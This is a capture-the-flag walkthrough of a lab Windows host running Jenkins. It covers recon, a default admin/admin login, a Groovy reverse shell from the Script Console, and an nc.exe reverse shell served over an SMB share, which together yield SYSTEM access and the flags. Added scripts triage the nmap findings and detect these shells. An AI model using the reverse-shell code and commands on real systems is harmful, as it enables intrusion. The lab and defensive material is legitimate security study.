BUILD MACHINE

 BUILD


First of all, let's locate the target machine on the local network. For that we use arp-scan to discover the active hosts, identifying 192.168.88.6 as the target, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.3
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.4    00:e0:4c:69:66:4a    (Unknown)
192.168.88.5    00:d8:61:fa:c0:4a    (Unknown)
192.168.88.6    08:00:27:b8:32:ce    (Unknown)
192.168.88.2    fe:63:75:f7:c0:b8    (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.859 seconds (137.71 hosts/sec). 5 responded

Now let's run nmap to identify the open ports and services on the host 192.168.88.6, as you can see below. Note that the command uses -sC (default scripts) but not -sV, so the service names in the SERVICE column come from nmap's port table rather than from probing the service.
Key open ports and services include:
  • Web Servers:

    • Port 80 (HTTP): Running IIS Windows web server. It supports OPTIONS, TRACE (flagged as potentially risky), GET, HEAD, and POST methods. The webpage title is "IIS Windows."

    • Port 8080 (HTTP-proxy): Likely another web or application server. It has a robots.txt disallowing the root directory and no specific title.

  • Microsoft Windows Services:

    • Port 135 (MSRPC): Microsoft Remote Procedure Call, a core Windows networking component.

    • Port 139 (NetBIOS-SSN): NetBIOS Session Service, part of the SMB suite for file/printer sharing.

    • Port 445 (Microsoft-DS): Primary port for SMB over TCP/IP, used for file sharing and remote administration.

  • Other Services:

    • Port 7680 (Pando-pub): the name is nmap's port-table label for the Pando media booster; on a Windows 10 host this port is normally the Delivery Optimization service.

    • Port 5040 & 49664-49670: These ports are open but Nmap could not identify the specific services running on them. The high-numbered ports are often dynamic/ephemeral ports used by Windows services.

┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 192.168.88.6 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 19:55 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:55
Completed NSE at 19:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:55
Completed NSE at 19:55, 0.00s elapsed
Initiating ARP Ping Scan at 19:55
Scanning 192.168.88.6 [1 port]
Completed ARP Ping Scan at 19:55, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:55
Scanning 192.168.88.6 [65535 ports]
Discovered open port 8080/tcp on 192.168.88.6
Discovered open port 135/tcp on 192.168.88.6
Discovered open port 445/tcp on 192.168.88.6
Discovered open port 139/tcp on 192.168.88.6
Discovered open port 80/tcp on 192.168.88.6

Discovered open port 49667/tcp on 192.168.88.6
Discovered open port 7680/tcp on 192.168.88.6
Discovered open port 49668/tcp on 192.168.88.6
Discovered open port 49670/tcp on 192.168.88.6
Discovered open port 49669/tcp on 192.168.88.6
Discovered open port 49665/tcp on 192.168.88.6
Discovered open port 49664/tcp on 192.168.88.6
Discovered open port 5040/tcp on 192.168.88.6
Discovered open port 49666/tcp on 192.168.88.6

Completed SYN Stealth Scan at 19:55, 14.62s elapsed (65535 total ports)
NSE: Script scanning 192.168.88.6.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:55
NSE Timing: About 92.96% done; ETC: 19:56 (0:00:02 remaining)
NSE Timing: About 93.45% done; ETC: 19:56 (0:00:04 remaining)
NSE Timing: About 94.24% done; ETC: 19:57 (0:00:06 remaining)
NSE Timing: About 96.75% done; ETC: 19:57 (0:00:04 remaining)
Completed NSE at 19:57, 127.60s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.01s elapsed
Nmap scan report for 192.168.88.6
Host is up, received arp-response (0.00080s latency).
Scanned at 2025-07-18 19:55:28 CEST for 142s
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE

|_http-title: IIS Windows
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
5040/tcp  open  unknown      syn-ack ttl 128
7680/tcp  open  pando-pub    syn-ack ttl 128
8080/tcp  open  http-proxy   syn-ack ttl 128
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
49664/tcp open  unknown      syn-ack ttl 128
49665/tcp open  unknown      syn-ack ttl 128
49666/tcp open  unknown      syn-ack ttl 128
49667/tcp open  unknown      syn-ack ttl 128
49668/tcp open  unknown      syn-ack ttl 128
49669/tcp open  unknown      syn-ack ttl 128
49670/tcp open  unknown      syn-ack ttl 128
MAC Address: 08:00:27:B8:32:CE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Host script results:
| nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:32:ce (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   BUILD<00>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   BUILD<20>            Flags: <unique><active>
| Statistics:
|   08:00:27:b8:32:ce:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: 9h00m02s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 14903/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21879/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12318/udp): CLEAN (Timeout)
|   Check 4 (port 18102/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-07-19T02:55:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 142.76 seconds
           Raw packets sent: 72722 (3.200MB) | Rcvd: 65536 (2.621MB)
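The scan above already gives a defender enough to rank what needs fixing on this host. The following script is an added example (not from the write-up) that parses nmap's normal output, using a trimmed copy of the output above as its embedded sample, and flags the items this scan exposes: the TRACE method on the IIS site, SMB signing enabled but not required, the open ports nmap could not name, and the second HTTP service on 8080. The regular expression, the port-to-finding mapping and the finding texts are my own choices, not nmap's.

```python
import re

# Constructed sample: a trimmed copy of the nmap normal output shown above,
# embedded so the script runs offline.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.88.6
Host is up, received arp-response (0.00080s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
5040/tcp  open  unknown      syn-ack ttl 128
7680/tcp  open  pando-pub    syn-ack ttl 128
8080/tcp  open  http-proxy   syn-ack ttl 128
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
49664/tcp open  unknown      syn-ack ttl 128
49665/tcp open  unknown      syn-ack ttl 128

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# One port line of nmap's normal output: "80/tcp    open  http   syn-ack ttl 128"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")


def parse_ports(text):
    """Return (port, proto, state, service) tuples from nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def triage(text):
    """Return sorted (port, finding) pairs a defender should act on."""
    findings = []
    current = None  # port whose NSE script output we are currently reading
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
        elif line.startswith("Host script results"):
            current = None
        elif "Potentially risky methods:" in line and current is not None:
            methods = line.split(":", 1)[1].split()
            findings.append((current, "risky HTTP methods: " + ", ".join(methods)))
        elif "Message signing enabled but not required" in line:
            # smb2-security-mode is a host script; the finding belongs to SMB on 445
            findings.append((445, "SMB signing not enforced"))
    for port, _proto, state, service in parse_ports(text):
        if state != "open":
            continue
        if service == "unknown":
            findings.append((port, "open port with unidentified service"))
        if port == 8080:
            findings.append((port, "secondary HTTP service, check for admin consoles"))
    return sorted(findings)


if __name__ == "__main__":
    for port, finding in triage(SAMPLE_NMAP):
        print(f"{port:>5}  {finding}")
```

Each finding maps to a concrete fix on the host: disable the TRACE verb on the IIS site, require SMB signing through policy, identify or close the unnamed listeners, and put the 8080 service behind real authentication (which, as the next steps show, is exactly what this Jenkins instance lacks).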

Now we have access to this URL, which is , but there isn't anything there, as you can see in the picture below.

Now we have access to this URL, which is , but here there is a login panel asking for a username and password, as you can see in the picture below; the credentials are username admin and password admin.

Now we want to obtain access from our attacker machine, so we should look for an entry named Script Console, as you can see in the second picture below.

Now we have to find our own IP address, which we can do with the command hostname -I, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# hostname -I
192.168.88.3 172.17.0.1 fd00::109a:ecf0:7b35:32a7 fd00::a00:27ff:fe4d:8a0f

In the next step we use a Jenkins (Groovy) reverse shell, which you can see below.

Thread.start {
    String host = "192.168.88.3";  // the attacker IP address
    int port = 8044;               // the attacker port that will be listening
    String cmd = "cmd.exe";
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s = new Socket(host, port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    while (!s.isClosed()) {
        while (pi.available() > 0) so.write(pi.read());
        while (pe.available() > 0) so.write(pe.read());
        while (si.available() > 0) po.write(si.read());
        so.flush(); po.flush(); Thread.sleep(50);
        try { p.exitValue(); break; } catch (Exception e) {}
    };
    p.destroy(); s.close();
}

Now we have to listen on the same port, 8044, with the command below; then we run the script in the Script Console and we obtain a shell on our machine, as you can see below.
  • nc -lvnp 8044

┌──(root㉿kali)-[/home/luis]
└─# nc -lvnp 8044
listening on [any] 8044

Gotcha! We have got the reverse shell, but I want to show another, more interesting way to do it.

┌──(root㉿kali)-[/home/luis]
└─# nc -lvnp 8044
listening on [any] 8044 ...
connect to [192.168.88.3] from (UNKNOWN) [192.168.88.6] 51935
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Jenkins> 

Firstly, we have to execute find / -name nc.exe 2>/dev/null. This command searches the entire file system of the Kali Linux machine for a file named nc.exe; 2>/dev/null redirects any error messages (like "Permission denied") to /dev/null, keeping the output clean. It finds two copies:
  • /usr/share/seclists/Web-Shells/FuzzDB/nc.exe

  • /usr/share/windows-resources/binaries/nc.exe

┌──(root㉿kali)-[/home/luis]
└─# find / -name nc.exe 2>/dev/null
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe


Next, we execute cp /usr/share/windows-resources/binaries/nc.exe . which copies nc.exe (Netcat for Windows) from the Kali resources directory to the current directory (/home/luis). Netcat is a versatile networking utility, often called the "TCP/IP Swiss army knife", commonly used to create network connections and to listen for incoming ones; here it is used to establish the reverse shell.

┌──(root㉿kali)-[/home/luis]
└─# cp /usr/share/windows-resources/binaries/nc.exe .

Finally, ls confirms that nc.exe has been copied to the current directory, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# ls
Descargas   Escritorio  Música  password_bloodhound  prueba.elf  reverse.php  Vídeos
Documentos  Imágenes    nc.exe  Plantillas           Público     SMS-Bomber   Win7Blue


Then, impacket-smbserver recurso $(pwd) -smb2support: this command uses impacket-smbserver (from the Impacket toolkit) to set up an SMB server on the Kali machine.
  • recurso: the name of the SMB share that will be created.
  • $(pwd): expands to the current working directory (/home/luis), so the contents of /home/luis are shared through the recurso share.
  • -smb2support: enables the SMB2 protocol, which modern Windows systems require.
The output [*] Incoming connection (192.168.88.6,51938) and the subsequent AUTHENTICATE_MESSAGE and User BUILD\ authenticated successfully lines show that the target (192.168.88.6) connected to and authenticated with the SMB server (started this way, with no credentials configured, impacket-smbserver accepts any login, which is why the empty BUILD\ user succeeds). This is crucial because it confirms the target can reach the shared nc.exe.

┌──(root㉿kali)-[/home/luis]
└─# impacket-smbserver recurso $(pwd) -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

[*] Incoming connection (192.168.88.6,51938)
[*] AUTHENTICATE_MESSAGE (\,BUILD)
[*] User BUILD\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:recurso)
[*] Connecting Share(2:IPC$)
[-] SMB2_TREE_CONNECT not found SystemResources
[-] SMB2_TREE_CONNECT not found SystemResources
[*] Disconnecting Share(2:IPC$)


Now we have to execute the command which you can see below:

println "\\\\192.168.88.3\\recurso\\nc.exe 192.168.88.3 4444 -e cmd.exe".execute().text: this is the critical command, which you must run in the Jenkins Script Console of the web interface; it executes on the Jenkins server (192.168.88.6), launching nc.exe from the recurso share so that it connects back to our listener on port 4444.

┌──(luis㉿kali)-[~/Descargas]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.88.3] from (UNKNOWN) [192.168.88.6] 51939
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.


C:\Program Files\Jenkins>
C:\Program Files\Jenkins>whoami
whoami
nt authority\system

C:\Program Files\Jenkins>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files\Jenkins

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
07/18/2025  07:53 PM            28,291 jenkins.err.log
05/28/2025  10:10 AM           620,544 jenkins.exe
05/28/2025  01:32 PM               219 jenkins.exe.config
05/31/2025  11:08 AM               156 jenkins.out.log
05/28/2025  01:14 PM        94,299,904 Jenkins.war
07/18/2025  07:53 PM             4,934 jenkins.wrapper.log
05/31/2025  10:38 AM             3,003 jenkins.xml
               7 File(s)     94,957,051 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Program Files\Jenkins>cd ..
cd ..

C:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
05/31/2025  10:37 AM    <DIR>          Common Files
05/05/2023  05:27 AM    <DIR>          Internet Explorer
05/31/2025  10:37 AM    <DIR>          Java
05/31/2025  10:38 AM    <DIR>          Jenkins
12/07/2019  02:14 AM    <DIR>          ModifiableWindowsApps
05/31/2025  10:31 AM    <DIR>          Windows Defender
05/05/2023  05:27 AM    <DIR>          Windows Mail
05/05/2023  05:27 AM    <DIR>          Windows Media Player
12/07/2019  02:54 AM    <DIR>          Windows Multimedia Platform
12/07/2019  02:50 AM    <DIR>          Windows NT
05/05/2023  05:27 AM    <DIR>          Windows Photo Viewer
12/07/2019  02:54 AM    <DIR>          Windows Portable Devices
12/07/2019  02:31 AM    <DIR>          Windows Security
12/07/2019  02:31 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              16 Dir(s)  32,729,485,312 bytes free

C:\Program Files>cd Jenkins
cd Jenkins

C:\Program Files\Jenkins>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files\Jenkins

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
07/18/2025  07:53 PM            28,291 jenkins.err.log
05/28/2025  10:10 AM           620,544 jenkins.exe
05/28/2025  01:32 PM               219 jenkins.exe.config
05/31/2025  11:08 AM               156 jenkins.out.log
05/28/2025  01:14 PM        94,299,904 Jenkins.war
07/18/2025  07:53 PM             4,934 jenkins.wrapper.log
05/31/2025  10:38 AM             3,003 jenkins.xml
               7 File(s)     94,957,051 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Program Files\Jenkins>cd ..
cd ..

C:\Program Files>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\

05/31/2025  11:07 AM    <DIR>          inetpub
12/07/2019  02:14 AM    <DIR>          PerfLogs
05/31/2025  10:38 AM    <DIR>          Program Files
05/31/2025  10:31 AM    <DIR>          Program Files (x86)
05/31/2025  11:09 AM    <DIR>          Users
05/31/2025  11:07 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\>cd Users    
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users

05/31/2025  11:09 AM    <DIR>          .
05/31/2025  11:09 AM    <DIR>          ..
05/31/2025  10:22 AM    <DIR>          Administrator
05/31/2025  10:01 AM    <DIR>          builder
07/18/2025  07:57 PM    <DIR>          DefaultAppPool
05/31/2025  12:50 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\Users>cd builder
cd builder

C:\Users\builder>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users\builder

05/31/2025  10:01 AM    <DIR>          .
05/31/2025  10:01 AM    <DIR>          ..
05/31/2025  12:50 AM    <DIR>          3D Objects
05/31/2025  12:50 AM    <DIR>          Contacts
05/31/2025  10:50 AM    <DIR>          Desktop
05/31/2025  12:50 AM    <DIR>          Documents
05/31/2025  12:50 AM    <DIR>          Downloads
05/31/2025  12:50 AM    <DIR>          Favorites
05/31/2025  12:50 AM    <DIR>          Links
05/31/2025  12:50 AM    <DIR>          Music
05/31/2025  12:52 AM    <DIR>          OneDrive
05/31/2025  12:52 AM    <DIR>          Pictures
05/31/2025  12:50 AM    <DIR>          Saved Games
05/31/2025  12:51 AM    <DIR>          Searches
05/31/2025  12:50 AM    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  32,729,485,312 bytes free

C:\Users\builder>cd Desktop
cd Desktop

C:\Users\builder\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

Gotcha! I have found the user flag, which you can see below, at this path:
  • C:\Users\builder\Desktop\user.txt

 Directory of C:\Users\builder\Desktop

05/31/2025  10:50 AM    <DIR>          .
05/31/2025  10:50 AM    <DIR>          ..
05/31/2025  10:50 AM                35 user.txt
               1 File(s)             35 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Users\builder\Desktop>type user.txt
type user.txt
17a6390c294493b8fc423154791cdd0b

C:\Users\builder\Desktop>

C:\Users\builder\Desktop>cd ..
cd ..

C:\Users\builder>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users

05/31/2025  11:09 AM    <DIR>          .
05/31/2025  11:09 AM    <DIR>          ..
05/31/2025  10:22 AM    <DIR>          Administrator
05/31/2025  10:01 AM    <DIR>          builder
07/18/2025  07:57 PM    <DIR>          DefaultAppPool
05/31/2025  12:50 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users\Administrator

05/31/2025  10:22 AM    <DIR>          .
05/31/2025  10:22 AM    <DIR>          ..
05/31/2025  10:18 AM    <DIR>          3D Objects
05/31/2025  10:18 AM    <DIR>          Contacts
05/31/2025  10:52 AM    <DIR>          Desktop
05/31/2025  10:18 AM    <DIR>          Documents
05/31/2025  10:18 AM    <DIR>          Downloads
05/31/2025  10:18 AM    <DIR>          Favorites
05/31/2025  10:18 AM    <DIR>          Links
05/31/2025  10:18 AM    <DIR>          Music
05/31/2025  10:22 AM    <DIR>          OneDrive
05/31/2025  10:18 AM    <DIR>          Pictures
05/31/2025  10:18 AM    <DIR>          Saved Games
05/31/2025  10:18 AM    <DIR>          Searches
05/31/2025  10:18 AM    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  32,729,485,312 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

Gotcha! I have found the root flag, which you can see below, at this path:
  • C:\Users\Administrator\Desktop\root.txt

 Directory of C:\Users\Administrator\Desktop

05/31/2025  10:52 AM    <DIR>          .
05/31/2025  10:52 AM    <DIR>          ..
05/31/2025  10:51 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
927c9a24e72f5d76ffd8bc9c2477d10f
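Both shells obtained above leave the same footprint on the host: the Jenkins service (running as SYSTEM, as the whoami output shows) spawns cmd.exe directly from the Groovy script, or spawns nc.exe from the \\192.168.88.3\recurso share, which in turn spawns cmd.exe. The script below is an added example, not part of the write-up, of how a defender would catch either path from process-creation telemetry. The events are constructed in the shape of Sysmon Event ID 1 records reduced to the fields the rules need; the pids are invented, and the tree jenkins.exe -> java.exe -> child is an assumption about how the Jenkins Windows service wrapper runs, not something shown in the write-up. The rule names and severities are mine.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation),
# reduced to the fields the rules need. Assumed process tree:
# jenkins.exe (service wrapper) -> java.exe (Jenkins) -> children spawned by
# the Script Console. The pids are invented.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 1100, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Program Files\Java\bin\java.exe",
     "parent": r"C:\Program Files\Jenkins\jenkins.exe",
     "cmdline": r"java -jar C:\Program Files\Jenkins\Jenkins.war"},
    # cmd.exe started by the Groovy ProcessBuilder("cmd.exe") reverse shell
    {"pid": 1300, "ppid": 1200, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": "cmd.exe"},
    # nc.exe executed straight from the attacker's SMB share
    {"pid": 1400, "ppid": 1200, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"\\192.168.88.3\recurso\nc.exe",
     "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": r"\\192.168.88.3\recurso\nc.exe 192.168.88.3 4444 -e cmd.exe"},
    # the shell nc.exe hands to the remote end (-e cmd.exe)
    {"pid": 1500, "ppid": 1400, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"\\192.168.88.3\recurso\nc.exe",
     "cmdline": "cmd.exe"},
    # benign: a build step under Jenkins and an interactive user shell
    {"pid": 1600, "ppid": 1200, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Program Files\Git\cmd\git.exe",
     "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": "git fetch origin"},
    {"pid": 1700, "ppid": 900, "user": r"BUILD\builder",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
JENKINS_PROCS = {"java.exe", "jenkins.exe"}
# \\host\share\ at the start of an image path or anywhere in a command line
UNC_RE = re.compile(r"\\\\[\w.\-]+\\[^\\\s]+\\")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parent_chain(event, by_pid):
    """Names of the recorded parent, grandparent, ... of an event."""
    chain = [basename(event["parent"])]
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(basename(cur["parent"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Return (pid, rule, severity) for every event that matches a rule."""
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        # a shell inherited from the service account is the worst case
        severity = "high" if ev["user"].upper().endswith("\\SYSTEM") else "medium"
        image = basename(ev["image"])
        if image in SHELLS and any(p in JENKINS_PROCS for p in parent_chain(ev, by_pid)):
            alerts.append((ev["pid"], "jenkins_spawned_shell", severity))
        if UNC_RE.match(ev["image"]) or UNC_RE.search(ev["cmdline"]):
            alerts.append((ev["pid"], "exec_from_network_share", severity))
    return alerts


if __name__ == "__main__":
    for pid, rule, sev in detect(SAMPLE_EVENTS):
        print(f"{sev:6} pid={pid} {rule}")
```

The first rule walks the whole ancestry rather than checking only the direct parent, which is what catches the nc.exe -> cmd.exe hop; the second rule fires on the share path regardless of what the binary is called. Both are far easier to act on than the shells themselves: the mitigations are to run Jenkins as a dedicated low-privilege service account instead of SYSTEM, to restrict the Script Console to a small admin group with real credentials, and to block outbound SMB from build servers.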

Thank you very much for reading this article.

I hope you liked it and learned something new.

This article has been written for ethical purposes.

Good Hack
